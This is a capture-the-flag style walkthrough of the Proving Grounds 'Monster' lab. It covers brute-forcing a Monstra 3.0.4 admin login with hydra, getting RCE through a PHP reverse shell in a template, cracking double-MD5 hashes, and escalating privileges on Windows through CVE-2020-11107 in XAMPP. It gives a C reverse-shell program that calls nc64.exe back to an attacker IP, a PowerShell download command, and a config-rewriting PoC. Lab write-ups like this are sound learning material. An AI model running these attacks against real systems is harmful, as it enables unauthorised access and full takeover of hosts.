Monster - Proving Grounds Practice
Enumeration
Nmap
Initial nmap scan revealed SMB, MySQL and HTTP ports were open.
Website
Initial website was static website.
So I applied directory brute force and found /blog endpoint.
The website was redirecting us to monster.pg domain.
So I added it to /etc/hosts file.
The blog website was Monstra 3.0.4
Exploitation
Brute Force
At first I tried default credentials but non of them worked. Then I used cewl to create a wordlist.
cewl http://monster.pg/ > passlist
And then I applied hydra brute force and found password for admin user.
hydra -l admin -P passlist monster.pg http-post-form '/blog/admin/:login=^USER^&password=^PASS^&login_submit=Log+In:F=Wrong' -I -f -V
Monstra 3.0.4 RCE
Later I found this (https://github.com/monstra-cms/monstra/issues/470) github repository which explain how to abuse this version to get a reverse shell.
- Log into the panel.
- Go to “/monstra-3.0.4/admin/index.php?id=themes&action=edit_template&filename=blog”
- Click edit Blog
- Insert payload easy-simple-php-webshell.php
- Reload page review code excution
So I used ivan-sincek/php-reverse-shell to create a reverse shell and updated IP and port values.
Later, I visited the created page blog which is located at /blog/blog and got a reverse shell.
Privilege Escalation
users.table.xml decryption
At first I found users.table.xml file located at C:\xampp\htdocs\blog\storage.
Then using an online purifier (https://jsonformatter.org/xml-formatter) I purified the XML output.
We already knew admin password but there was another user. While checking I found this post (https://simpleinfoseccom.wordpress.com/2018/05/27/monstra-cms-3-0-4-unauthenticated-user-credential-exposure/)
which explain how passwords are stored in users.table.xml file.
To understand it even more I checked Security.php file under C:\xampp\htdocs\blog\engine and found encryption code.
/**
* Encrypt password
*
* <code>
* $encrypt_password = Security::encryptPassword('password');
* </code>
*
* @param string $password Password to encrypt
*/
public static function encryptPassword($password)
{
return md5(md5(trim($password) . MONSTRA_PASSWORD_SALT));
}
It was simply concataneting password and salt then applying MD5 twice. So I checked defines.php file under C:\xampp\htdocs\blog\boot which showed salt value.
/**
* Set password salt
*/
define('MONSTRA_PASSWORD_SALT', 'YOUR_SALT_HERE');
So it was simply YOUR_SALT_HERE. I could now crack the passwords. I tried to crack it with rockyou.txt using hashcat with mode 2630 and it worked. I cracked it.
However, it was not useful because I already got mike shell and it was mike’s password.
CVE-2020-11107
An issue was discovered in XAMPP before 7.2.29, 7.3.x before 7.3.16 , and 7.4.x before 7.4.4 on Windows. An unprivileged user can change a .exe configuration in xampp-contol.ini for all users (including admins) to enable arbitrary command execution.
So later, I executed WinPEAS.exe and found I had write privileges over C:\xampp. Some research revealed there was a CVE assigned to it.
I found this repo (Mohnad-AL-saif/Mohnad-AL-saif-CVE-2020-11107-XAMPP-Local-Privilege-Escalation) which explains this exploitation in detail.
At first I checked the version using type C:\xampp\properties.ini.
It was vulnerable. So I created a malicious executable using C and i686-w64-mingw32-gcc after transferring nc64.exe file.
#include <stdlib.h>
int main(void){
system("C:\\ProgramData\\nc64.exe 192.168.45.216 445 -e cmd.exe");
return 0;
}
i686-w64-mingw32-gcc exp.c -l ws2_32 -o exp.exe
Then I created a temp folder using mkdir C:\temp and I transfered my malicious file to here using powershell iwr http://192.168.45.216/exp.exe -outfile C:\temp\msf.exe.
Then I created a powershell script to exploit this.
# CVE-2020-11107 PoC
$file = "C:\xampp\xampp-control.ini"
$find = ((Get-Content $file)[2] -Split "=")[1]
$replace = "C:\temp\msf.exe"
(Get-Content $file) -replace $find, $replace | Set-Content $file
Later I simply executed the ps1 payload using powershell -ExecutionPolicy Bypass -File exp.ps1 and started waiting.
After sometime I got administrator shell.